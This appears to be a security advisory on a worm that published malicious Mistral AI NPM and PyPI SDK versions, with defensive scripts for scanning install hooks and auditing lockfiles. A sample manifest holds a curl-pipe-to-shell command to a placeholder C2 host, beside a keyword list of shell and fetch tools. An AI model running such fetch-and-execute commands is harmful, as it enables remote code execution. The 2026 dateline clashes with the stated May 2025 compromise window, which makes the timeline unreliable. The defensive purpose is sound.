May 18, 2026 · 5 min read
Mistral AI's official NPM and PyPI packages were compromised by the Mini Shai-Hulud worm via a developer's stolen session tokens. Malicious package versions containing secondary dropper scripts were published, requiring immediate dependency auditing and secret rotation.
A significant supply chain compromise affected official Mistral AI software development kits (SDKs) in both the NPM and PyPI ecosystems. The incident involved an automated worm known as 'Mini Shai-Hulud' that used stolen maintainer credentials to publish malicious package versions containing secondary dropper payloads.
The vulnerability represents a direct supply chain compromise affecting the official software development kits published by Mistral AI. The attack surface encompasses developer workstations, CI/CD pipelines, and any downstream systems consuming the affected dependencies from the NPM and PyPI registries.
The impacted components include multiple @mistralai scoped packages on NPM, specifically @mistralai/mistralai, @mistralai/mistralai-azure, and @mistralai/mistralai-gcp. A parallel compromise occurred in the Python ecosystem, affecting the mistralai package version 2.4.6 on PyPI.
The root cause was not a flaw in the Mistral SDK codebase itself, but rather the compromise of the software distribution pipeline. An automated worm utilized stolen authentication tokens to masquerade as an authorized maintainer, subverting the trust controls inherent in package management ecosystems.
The initial vector of the compromise traces back to a third-party developer ecosystem. The automated worm, designated 'Mini Shai-Hulud', originally targeted maintainers of the TanStack project. The worm acquired access to developer environments by stealing authentication tokens and session cookies associated with NPM and PyPI registries.
A Mistral AI developer held maintainer privileges for both the targeted third-party libraries and official Mistral AI repositories. The worm compromised this specific developer's local environment, granting the malware administrative access to Mistral's package publishing pipeline.
Once the local environment was compromised, the worm autonomously enumerated all packages for which the infected developer possessed publishing rights. It then initiated automated uploads of new package versions containing the embedded malicious payload, bypassing manual code review processes.
The injected payload varied in functionality depending on the target ecosystem. The malicious code published to the @mistralai NPM packages functioned as a dropper, designed to fetch and execute a secondary payload from a remote command-and-control server.
Analysis from multiple security vendors confirmed that the NPM variant of the dropper was broken. Execution failures within the post-install script prevented the final malware stage from running successfully on many victim machines. This execution failure mitigated the immediate technical impact for NPM consumers.
Conversely, the PyPI payload embedded within mistralai==2.4.6 was fully functional. This variant successfully executed its primary objectives, which included credential exfiltration and the subsequent propagation of the worm to newly infected developer environments.
The attack methodology relies entirely on subverting developer trust and manipulating package manager behaviors. The worm hooks into the installation phase of the package lifecycle. For NPM, this typically involves defining a preinstall or postinstall script within the malicious package.json.
When a victim executes a standard installation command, the package manager inadvertently triggers the worm's bootstrap script. The script immediately attempts to spawn a hidden shell process to execute encoded instructions or initiate network connections to external infrastructure.
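Because the worm attaches to the install phase, the first thing a defender wants is an inventory of which installed packages declare preinstall, install or postinstall hooks at all, and which of those hooks spawn an interpreter or reach the network. The script below is an added example written for this article, not tooling from Mistral AI or from any vendor analysis; the two manifests it inspects are constructed samples (the package names and the `c2.example.invalid` URL are placeholders), and the keyword list is a triage heuristic, not a signature for this worm.

```python
"""Enumerate npm lifecycle install hooks across a dependency tree.

Added example for the advisory above; not code from Mistral AI or the
security vendors it cites. Reads each package.json under node_modules and
reports preinstall/install/postinstall scripts, which is the hook point a
dropper of this kind uses.
"""
import json
import os
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic markers of a hook spawning a shell/interpreter or fetching a
# second stage. Hits are a triage queue for a human, not a verdict.
SUSPICIOUS = re.compile(
    r"\b(node\s+-e|eval|curl|wget|bash|sh\s+-c|powershell|base64|Buffer\.from)\b",
    re.IGNORECASE,
)


def inspect_manifest(name_hint: str, manifest_text: str) -> list:
    """Return (package, hook, command, suspicious) for each install hook
    declared in one package.json. An unparseable manifest is itself reported."""
    try:
        manifest = json.loads(manifest_text)
    except json.JSONDecodeError:
        return [(name_hint, "<unparseable>", "", True)]
    name = manifest.get("name", name_hint)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            findings.append((name, hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return findings


def scan_node_modules(root: str) -> list:
    """Walk an installed node_modules tree and collect every install hook."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                findings.extend(inspect_manifest(os.path.relpath(dirpath, root), fh.read()))
    return findings


def suspicious_only(findings: list) -> list:
    """Filter scan results down to hooks that tripped the heuristic."""
    return [f for f in findings if f[3]]


# Constructed sample manifests (not real packages) so the script runs offline.
BENIGN_MANIFEST = json.dumps({
    "name": "native-addon-sample",
    "scripts": {"install": "node-gyp rebuild", "test": "mocha"},
})
DROPPER_STYLE_MANIFEST = json.dumps({
    "name": "dropper-sample",
    "scripts": {"postinstall": "curl -s http://c2.example.invalid/stage2 | sh"},
})

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_MANIFEST), ("dropper", DROPPER_STYLE_MANIFEST)):
        for pkg, hook, cmd, flagged in inspect_manifest(label, text):
            print(f"{'!!' if flagged else '  '} {pkg}: {hook} -> {cmd}")
```

Run `scan_node_modules("node_modules")` against a project checkout to get the full list and `suspicious_only(...)` for the triage subset. Independently of this scan, installing with `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, which would have prevented the bootstrap described above from executing on install; packages that genuinely need a build step then have to be rebuilt explicitly.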
The fully functional PyPI payload actively scans the local environment for configuration files, environment variables, and SSH keys. It targets high-value secrets, particularly authentication tokens that allow the worm to authenticate against version control systems and package registries to continue its lateral movement.
Successful execution of the functional payload results in a total loss of confidentiality and integrity for the infected environment. The attacker gains the capability to execute arbitrary code with the privileges of the user invoking the package manager.
The primary objective of the payload is credential theft. Any secrets, API keys, or environment variables present on the compromised system must be considered compromised. Specifically, the MISTRAL_API_KEY is at high risk of exfiltration, leading to unauthorized resource consumption and potential data exposure on the Mistral AI platform.
Forensic investigations by Mistral AI concluded that their internal infrastructure and production systems were not compromised during this incident. The blast radius was strictly limited to systems consuming the affected package versions published via the single compromised developer account.
Immediate remediation requires verifying installed package versions across all projects. Development and security teams must audit package.json, package-lock.json, and requirements.txt files for any @mistralai scoped dependencies or the mistralai Python package updated around May 12, 2025.
If compromised versions are identified, they must be removed, and systems updated to the latest available clean versions published after the incident. Developers must forcefully purge local package caches to prevent accidental re-installation of the malicious artifacts.
```bash
# Purge NPM cache forcefully
npm cache clean --force
# Reinstall dependencies
npm install
```

Credential rotation is mandatory for any environment that executed the compromised packages. Administrators must immediately revoke and reissue all secrets, API keys, and specifically any MISTRAL_API_KEY instances that were accessible to the affected system during the vulnerability window.
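The audit step above (check package-lock.json and requirements.txt for the named packages) is easy to script across many repositories. The following is an added example, not Mistral AI's tooling: it flags the PyPI pin `mistralai==2.4.6` exactly as the advisory names it, and, because the advisory identifies the NPM packages by publish window rather than by version number, it lists every pinned version of the three `@mistralai` packages so that each can be checked against the registry's publish date. The lockfile and requirements contents embedded below are constructed samples; the NPM version `1.5.2` in them is a placeholder, not a known-bad release.

```python
"""Audit lockfiles and requirements files for the packages named in the
advisory above. Added example; not code from Mistral AI.

Affected-package data is transcribed from the advisory. Sample inputs are
constructed so the script runs offline.
"""
import json
import re

# NPM packages the advisory names. It gives a publish window (~May 12), not
# version numbers, so every pinned version is surfaced for manual checking.
NPM_WATCHLIST = {
    "@mistralai/mistralai",
    "@mistralai/mistralai-azure",
    "@mistralai/mistralai-gcp",
}
# PyPI version the advisory identifies as carrying the functional payload.
PYPI_BAD_VERSIONS = {"mistralai": {"2.4.6"}}


def _walk_v1(deps: dict, prefix: str, hits: list) -> None:
    """Recurse through a lockfileVersion 1 'dependencies' tree."""
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        if name in NPM_WATCHLIST:
            hits.append((name, meta.get("version"), path))
        _walk_v1(meta.get("dependencies", {}), path + "/", hits)


def audit_package_lock(lock_text: str) -> list:
    """Return (name, version, path) for watchlisted packages in package-lock.json.
    Handles the v2/v3 'packages' map and falls back to the v1 'dependencies' tree."""
    lock = json.loads(lock_text)
    hits = []
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project entry, not a dependency
                continue
            # Nested installs look like node_modules/a/node_modules/@scope/b
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            if name in NPM_WATCHLIST:
                hits.append((name, meta.get("version"), path))
    else:
        _walk_v1(lock.get("dependencies", {}), "", hits)
    return hits


def audit_requirements(req_text: str) -> list:
    """Return (name, version) for exact pins matching a known bad version."""
    hits = []
    for line in req_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        m = re.match(r"^([A-Za-z0-9_.-]+)\s*==\s*([A-Za-z0-9_.+!-]+)", line)
        if not m:
            continue
        # Normalise the name the way pip does (case- and separator-insensitive)
        name, version = m.group(1).lower().replace("_", "-"), m.group(2)
        if version in PYPI_BAD_VERSIONS.get(name, set()):
            hits.append((name, version))
    return hits


def audit_project(lock_text: str, req_text: str) -> dict:
    """Combine both audits into one report for a project."""
    return {"npm": audit_package_lock(lock_text), "pypi": audit_requirements(req_text)}


# Constructed sample inputs (placeholder versions, not real affected releases).
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"@mistralai/mistralai": "^1.5.2", "left-pad": "^1.3.0"}},
        "node_modules/@mistralai/mistralai": {"version": "1.5.2"},
        "node_modules/left-pad": {"version": "1.3.0"},
    },
})
SAMPLE_REQUIREMENTS = """# constructed sample requirements.txt
requests==2.31.0
mistralai==2.4.6  # pinned on the affected build
Mistralai_extra==0.1.0
"""

if __name__ == "__main__":
    report = audit_project(SAMPLE_LOCK, SAMPLE_REQUIREMENTS)
    for eco, hits in report.items():
        for hit in hits:
            print(f"[{eco}] review: {hit}")
```

For the NPM findings, compare each flagged version's publish timestamp on the registry with the May 12 window before deciding whether to treat it as compromised; the PyPI match is an exact version and needs no further lookup.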
| Product | Vendor | Affected Versions | Fixed Version |
|---|---|---|---|
| @mistralai/mistralai (NPM) | Mistral AI | Versions published ~May 12, 2025 | Latest post-May 12 versions |
| @mistralai/mistralai-azure (NPM) | Mistral AI | Versions published ~May 12, 2025 | Latest post-May 12 versions |
| @mistralai/mistralai-gcp (NPM) | Mistral AI | Versions published ~May 12, 2025 | Latest post-May 12 versions |
| mistralai (PyPI) | Mistral AI | == 2.4.6 | Latest post-May 12 versions |
| Attribute | Detail |
|---|---|
| Attack Vector | Supply Chain Compromise |
| CWE ID | CWE-506 (Embedded Malicious Code) |
| Impact | Credential Theft / Arbitrary Code Execution |
| Vulnerable Packages | @mistralai/* (NPM), mistralai (PyPI) |
| Threat Actor / Malware | Mini Shai-Hulud Worm |
| Primary Target | Developer Environments |